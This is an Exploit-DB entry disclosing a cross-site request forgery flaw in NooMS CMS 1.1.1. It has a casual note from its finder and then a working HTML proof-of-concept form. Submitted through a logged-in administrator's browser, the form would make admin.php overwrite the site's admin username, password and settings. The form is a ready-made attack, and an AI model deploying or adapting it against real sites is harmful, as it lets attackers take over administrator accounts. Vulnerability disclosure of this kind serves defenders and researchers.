Nooms CMS 1.1.1 - Cross-Site Request Forgery

EDB-ID:

17137

CVE:

N/A




Platform:

PHP

Date:

2011-04-09


# NooMS CMS version 1.1.1 CSRF
# Bug Found: April 9th 2011
# Found by: loneferret (as far as I know anyway)
# Software Download Link:
http://phpkode.com/download/p/2381_nooms_1.1.1.tar.bz2
# Nods to exploit-db Team


# Well, I didn't have much to do this morning so figured I'd try to see how
# fast it would take
# me to find one of these. It's nothing to write home about. I mean...come
# on! Who would use
# a CMS named NooMS? This thing uses a MySQL database as well, wouldn't be
# surprised if
# there are other things to be found.
# But I need to get some chores done before the wife starts.

#
# Enjoy,
# loneferret
#
# p.s:
# I wanted to contact the creator, but he's page (using NooMS) is
# blank... nothing there so.. sorry.

---HTML STARTS HERE---

<form action='http://[host]/admin.php' method='post'>
  <input type=hidden name='op' value='pref'>
  <input type=hidden name='action' value='edit'>

  Admin Username: <input type=text size=20 name='admin_user' value=''><br>
  Admin Password: <input type=text size=20 name='admin_pwd' value=''><br>
  Site Name: <input type=text size=40 name='site_name' value=''><br>
  Site URL: <input type=text size=40 name='site_url' value=''><br>
  Number of results per page: <input type=text size=10 name='search_numr' value=''><br>
  Lang: <input type=text size=10 name='lang' value='en'><br>
  Theme: <input type=text name=template value='default'>
  <input type=submit value='change'>
</form>